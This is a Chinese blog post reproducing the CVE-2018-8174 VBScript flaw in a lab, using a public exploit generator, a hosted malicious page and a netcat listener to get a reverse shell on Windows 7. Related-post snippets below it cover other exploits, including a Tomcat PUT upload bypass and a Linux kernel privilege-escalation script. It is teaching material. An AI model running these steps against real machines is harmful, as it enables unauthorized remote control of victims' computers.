CVE-2018-8174漏洞获取shell复现

于 2022-06-13 20:39:22 发布
阅读量1.1k 收藏 6
点赞数 3
分类专栏: 渗透测试 文章标签: 渗透测试 Kali Linux CVE-2018-8174 信息安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125238255
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-8174漏洞获取shell复现。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、CVE-2018-8174漏洞简介

CVE-2018-8174漏洞是Windows VBScript Engine代码执行漏洞,该漏洞利用最新版本的IE浏览器内核的应用程序。利用该漏洞,用户在浏览网页或者是打开Office文档时都有可能被黑客所控制。微软官方在2018年4月20日早上确认该漏洞,并于2018年5月8号发布官方安全补丁,对该漏洞进行了修复,并将其命名为CVE-2018-8174。

二、利用漏洞生成网页

今天,我们就利用该漏洞,对目标Windows7的主机进行渗透测试。
首先,我们先下载该漏洞的利用工具,执行命令:

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

即可将该漏洞的利用工具下载下来,该命令执行结果如下所示:
在这里插入图片描述
该命令执行后,我们会看到在当前目录下出现了一个名为CVE-2018-8174_EXP的目录,我们进入该目录,然后执行命令:

python CVE-2018-8174.py -u http://192.168.136.199/exploit.html -o exp.rtf -i 192.168.136.199 -p 4444

-u参数表示生成漏洞利用html文档,-o参数表示输出生成的文档,-i参数表示该漏洞的payload要访问的IP地址,-p参数为该漏洞payload的端口号,该目录执行结果如下所示:
在这里插入图片描述
之后,我们将生成的exploit.html复制到/var/www/html/目录中,并打开apache2服务。
之后,我们使用nc命令在4444端口上开启监听,执行命令:

nc -lvvp 4444

该命令执行结果如下所示:
在这里插入图片描述

三、效果检验

在完成上述操作后,我们在一台Windows7设备上,使用IE浏览器,访问该页面,结果如下所示:
在这里插入图片描述
此时,我们的nc命令上也收到了来自windows的反弹shell,我们可以在该shell上执行命令了。过程如下所示:
在这里插入图片描述
从上图可以知道,我们利用CVE-2018-8174漏洞,成功拿到了目标主机的shell。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
Cwillchris的博客
05-27 689
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) CVE-2018-8174脚本 实验步骤: 1、xshell上传 CVE-2018-8174 的 EXP 到 Kali 2、解压 CVE-2018-8174 并进入该目录 3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问 python2
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
weixin_43894771的博客
03-10 1961
*0day一把怎样的武器 0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*
CVE-2018-8174双杀漏洞复现总结
weixin_44283446的博客
03-28 5510
CVE-2018-8174双杀漏洞复现总结漏洞原理环境说明漏洞复现 记录一下CVE-2018-8174双杀漏洞复现过程 漏洞原理 环境说明 攻击机:kali 靶机:windows2008 漏洞复现kali上下载exp https://github.com/Yt1g3r/CVE-2018-8174_EXP.git 也可以下载到本地 手动上传到kali上去 进入exp目录,生成payload cd CVE-2018-8174_EXP-master python CVE-2018-8174.py
CVE-2018-8174
weixin_51706044的博客
09-28 2037
漏洞描述: CVE-2018-8174Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码 操作 这里是先创建的CVE文件 克隆的命
CVE-2018-8174 IE浏览器远程代码执行漏洞
锋刃科技的博客
11-03 5970
0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.com/vulnerable/11441.html CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞 CVE地址:http://cve.mitre.org/cgi-bin/...
CVE-2018-8174(IE浏览器远程代码执行漏洞)
94小菜
11-29 781
漏洞描述: VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。      在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Exp
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: python CVE-2018-8174.py -u -o exp.rtf -i 2.2.2.2 -p 4444 将exploit.html放在您的服务器上(1.1.1.1) netcat收听[any] 4444(2.2.2.2) 好好享受 !
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft Office。 在本模块上有很多事情需要改进,但是如果有时间我会在将来进行更新。 安装 将CVE-2018-8174.rb复制到/ usr / share / metasploit-framework / modules / exploits / windows / fileformat / 将CVE-2018-8174.rtf复制到/ usr / share / metasploit-framework / data / exploits / 该漏洞无法与meterpreter shellcode一起很好地工作,因此
腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞
09-25
9 月 19 日,腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞CVE-2017-12616)、远程代码执行漏洞CVE-2017-12615),在某些场景下,攻击者将分别能通过这两个漏洞获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码。      云鼎实验室通过对于漏洞描述,搭建漏洞环境,并对其进行复现。此漏洞为高危漏洞,即使是非默认配置,但是一旦存在漏洞,那么攻击者可以成功上传 webshell,并控制服务器。 复现 根据描述,在 Windows 服务器下,将 readonly 参数设置为 false 时,即可通过 PUT 方式创建一个 JSP 文件,并可以执行任意代码。    通过阅读 conf/web.xml 文件,可以发现:   默认 readonly 为 true,当 readonly 设置为 false 时,可以通过 PUT / DELETE 进行文件操控。   配置 readonly 为 false: 启动 Tomcat,利用 PUT 请求创建文件: 提示 404。通过描述中的 Windows 受影响,可以结合 Windows 的特性。其一是 NTFS 文件流,其二是文件名的相关限制(如 Windows 中文件名不能以空格结尾)来绕过限制:  访问发现可以正常输出:  分析 Tomcat 的 Servlet 是在 conf/web.xml 配置的,通过配置文件可知,当后缀名为 .jsp 和 .jspx 的时候,是通过JspServlet处理请求的:   可以得知,“1.jsp ”(末尾有一个和空格)并不能匹配到 JspServlet,而是会交由DefaultServlet去处理。当处理 PUT 请求时: 会调用resources.rebind: dirContext 为FileDirContext: 调用 rebind创建文件: 又由于 Windows 不允许“ ”作为文件名结尾,所以会创建一个 .jsp 文件,导致代码执行。 Bypass 分析 然而,经过黑盒测试,当 PUT 地址为/1.jsp/时,仍然会创建 JSP,会影响 LinuxWindows 服务器,并且 Bypass 了之前的补丁,分析如下。  在进入 bind 函数时,会声明一个 File 变量: 进入 File 后,会对 name 进行 normalize 最后得到的 path 就是没有最后 / 的 path 了: 影响  由于存在去掉最后的 / 的特性,那么这个漏洞自然影响 Linux 以及 Windows 版本。而且经过测试,这个漏洞影响全部的 Tomcat 版本,从 5.x 到 9.x 无不中枪。目前来说,最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true,才能防止漏洞
CVE-2018-2628补丁安装手册
07-24
关于各种weblogic版本出现这个漏洞的修补方法,比较全面
cve-2018-8174_analysis:VBS漏洞CVE-2018-8174的分析
05-02
剖析现代浏览器漏洞CVE-2018-8174的案例研究 概述 当这种漏洞利用在4月和5月初首次出现时,引起了我的极大兴趣,因为尽管进行了大量的混淆,但代码结构似乎井井有条,漏洞利用代码小得足以使分析变得更简单。 我下载了并决定将其作为深入研究的理想之选。 当时已经发表了两项分析,第一篇来自 ,第二篇来自。 他们俩都帮助我了解了它的工作原理,但还不足以深入了解漏洞利用的各个方面。 这就是为什么我决定自己进行分析并分享我的发现的原因。 前处理 首先,为了消除整数混淆,我在python脚本中使用了正则表达式替换: import re def process ( matchobj ): line = matchobj . group ( 1 ) line = line . lower (). replace ( '&h' , '0x' ) return str ( eval ( line
CVE-2018-8174漏洞复现及内网渗透攻击
Waldocsdn的博客
03-12 2508
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Win server 2008 对Windows 7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows 7进攻Windows server 2008...
CVE-2018-8174漏洞两种姿势的复现
热门推荐
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174复现过程1: 1、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值